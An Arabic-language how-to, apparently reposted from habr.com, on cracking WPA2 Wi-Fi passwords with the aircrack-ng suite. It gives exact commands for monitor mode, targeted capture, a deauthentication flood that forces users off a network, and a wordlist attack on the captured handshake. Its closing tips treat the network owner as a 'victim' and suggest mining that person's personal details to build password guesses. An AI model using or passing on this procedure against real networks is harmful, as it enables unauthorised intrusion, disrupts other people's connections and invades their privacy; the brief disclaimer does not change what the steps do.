تخمين كلمة مرور Wi-Fi باستخدام الأداة المساعدة aircrack-ng

هذه المقالة مكتوبة لأغراض إعلامية وبحثية فقط. ونحن نحثكم على الالتزام بقواعد الشبكات والقانون، وتذكروا دائمًا أمن المعلومات.

مقدمة

في أوائل التسعينيات، عندما ظهرت شبكة Wi-Fi لأول مرة، تم إنشاء خوارزمية Wired Equivalent Privacy، والتي كان من المفترض أن تضمن سرية شبكات Wi-Fi. ومع ذلك، فقد أثبت WEP أنه خوارزمية أمان غير فعالة يسهل اختراقها.

وقد تم استبدالها بخوارزمية حماية Wi-Fi Protected Access II الجديدة، والتي تستخدمها معظم نقاط الوصول إلى Wi-Fi اليوم. يستخدم WPA2 خوارزمية تشفير AES، والتي يصعب للغاية اختراقها.

أين تكمن الثغرة؟

عيب WPA2 هو أن كلمة المرور المشفرة يتم إرسالها عندما يتصل المستخدمون أثناء ما يسمى بالمصافحة رباعية الاتجاهات. إذا تصافحنا، فسنعرف كلمة المرور المشفرة وكل ما علينا فعله هو فك تشفيرها. لهذا الغرض سوف نستخدم aircrack-ng.

فكيف الاختراق؟

الخطوة 1. تحديد الواجهة

نحتاج أولاً إلى معرفة واجهة الشبكة التي نحتاجها، وللقيام بذلك ندخل الأمر:

$ ifconfig

نحصل على الجواب:

eth0      no wireless extensions.

wlan0     IEEE 802.11abgn  ESSID:off/any
Mode:Managed  Access Point: Not-Associated   Tx-Power=15 dBm
Retry short limit:7   RTS thr:off   Fragment thr:off
Encryption key:off
Power Management:off

lo        no wireless extensions

في حالتي، هناك ثلاث واجهات فقط، اثنتان منها لا تحتويان على امتدادات لاسلكية. لذلك، نحن مهتمون فقط بـ wlan0.

الخطوة 2. ضع محول الشبكة في وضع المراقبة

إن وضع محول الشبكة في وضع المراقبة سيسمح لنا برؤية حركة المرور اللاسلكية القادمة بالقرب منا. للقيام بذلك، أدخل الأمر:

$ airmon-ng start wlan0

يرجى ملاحظة أن airmon-ng أعاد تسمية الواجهة الخاصة بك (أصبحت واجهتي الآن mon0، ولكن لا يزال يتعين عليك التحقق).

الخطوة 3. اعتراض حركة المرور

الآن بعد أن أصبح محول الشبكة في وضع المراقبة، يمكننا التقاط حركة المرور التي تمر بنا باستخدام الأمر airodump-ng. يدخل:

$ airodump-ng mon0

لاحظ أن كافة نقاط الوصول المرئية مدرجة في الجزء العلوي من الشاشة، ويتم إدراج العملاء في الجزء السفلي من الشاشة.

الخطوة 4. تركيز الاعتراض على نقطة وصول محددة.

خطوتنا التالية هي تركيز جهودنا على إحدى نقاط الوصول وقناتها. نحن مهتمون بمعرف BSSID ورقم القناة لنقطة الوصول التي سنقوم باختراقها. لنفتح محطة أخرى وندخل:

$ airodump-ng --bssid 08:86:30:74:22:76 -c 6 -w WPAcrack mon0

• 08:86:30:74:22:76 معرف BSSID لنقطة الوصول
• -c القناة 6 التي تعمل عليها نقطة وصول Wi-Fi
• ملف WPAcrack الذي سيتم تسجيل المصافحة فيه
• محول الشبكة mon0 في وضع المراقبة

كما ترون في لقطة الشاشة أعلاه، نحن الآن نركز على التقاط البيانات من نقطة وصول واحدة باستخدام ESSID Belkin276 على القناة 6. نترك المحطة مفتوحة!

الخطوة 5. تلقي المصافحة

للحصول على كلمة المرور المشفرة، نحتاج إلى مصادقة العميل (متصل بشبكة Wi-Fi). إذا تمت مصادقته بالفعل، فيمكننا إلغاء مصادقته (قطع الاتصال)، ثم سيقوم النظام تلقائيًا بإعادة المصادقة (الاتصال)، مما يؤدي إلى تمكننا من الحصول على كلمة المرور المشفرة.

أي أننا نحتاج فقط إلى قطع اتصال المستخدمين المتصلين حتى يتمكنوا من الاتصال مرة أخرى. للقيام بذلك، افتح محطة أخرى وأدخل:

$ aireplay-ng --deauth 100 -a 08:86:30:74:22:76 mon0

• 100 عدد المستخدمين الذين سيتم إلغاء مصادقتهم
• 08:86:30:74:22:76 معرف BSSID لنقطة الوصول
• محول الشبكة mon0

الآن، عند إعادة الاتصال، فإن النافذة التي تركناها في الخطوة السابقة ستلتقط المصافحة. دعنا نعود إلى محطة airodump-ng الخاصة بنا ونلقي نظرة.

لاحظ في السطر العلوي على اليمين، إخراج airodump-ng: "Handshake WPA". أي أننا نجحنا في الحصول على كلمة المرور المشفرة! هذه هي الخطوة الأولى للنجاح!

الخطوة 6. حدد كلمة المرور

الآن بعد أن حصلنا على كلمة المرور المشفرة في ملف WPACrack، يمكننا تشغيل تخمين كلمة المرور. ولكن لهذا نحتاج إلى قائمة بكلمات المرور التي نريد استخدامها. يمكنك العثور على مثل هذه القائمة في 5 دقائق على Google. ومع ذلك، سأستخدم قائمة كلمات المرور الافتراضية المضمنة في aircrack-ng: BackTrack darkcOde.

افتح محطة جديدة وأدخل:

$ aircrack-ng WPAcrack-01.cap -w /pentest/passwords/wordlists/darkc0de

• ملف WPACrack-01.cap الذي سجلنا فيه المصافحة (تمت إضافة airodump-ng -01.cap في النهاية)
• /pentest/passwords/wordlist/darkc0de المسار المطلق إلى قائمة كلمات المرور

كم من الوقت سوف يستغرق؟

يمكن أن تستغرق هذه العملية وقتًا طويلاً. كل هذا يتوقف على طول قائمة كلمات المرور الخاصة بك، يمكنك الانتظار من بضع دقائق إلى بضعة أيام. على معالج Intel ثنائي النواة، يخمن aircrack-ng ما يزيد قليلاً عن 800 كلمة مرور في الثانية.

عند العثور على كلمة المرور، سوف تظهر على شاشتك. يعتمد نجاح تخمين كلمة المرور أم لا على قائمتك. إذا لم تتمكن من تخمين كلمة المرور باستخدام قائمة واحدة، فلا تيأس، حاول تجربة أخرى.

نصائح للاستخدام

1. يعتبر هذا النوع من الهجمات فعالاً لتخمين كلمة المرور من القائمة، ولكنه غير مفيد عملياً للتخمين العشوائي. الأمر كله يتعلق بالتوقيت. إذا كانت شبكة Wi-Fi محمية بكلمة مرور متوسطة مكونة من أحرف وأرقام لاتينية، فسيستغرق الاختيار العشوائي عدة سنوات.
2. عند اختيار قائمة كلمات المرور، تأكد من مراعاة العوامل الجغرافية. على سبيل المثال، ليس هناك أي معنى في الاختيار في أحد مطاعم باريس باستخدام قائمة كلمات المرور الروسية.
3. إذا كنت تقوم باختراق شبكة Wi-Fi منزلية، فحاول معرفة أي بيانات شخصية للضحية (الاسم الأول واسم العائلة وتاريخ الميلاد واسم الكلب وما إلى ذلك) وقم بإنشاء قائمة إضافية بكلمات المرور من هذه البيانات.
4. بعد أن تصافح، قم بتعطيل aireplay-ng (لا تجعل المستخدمين العاديين يعانون).

المصدر: www.habr.com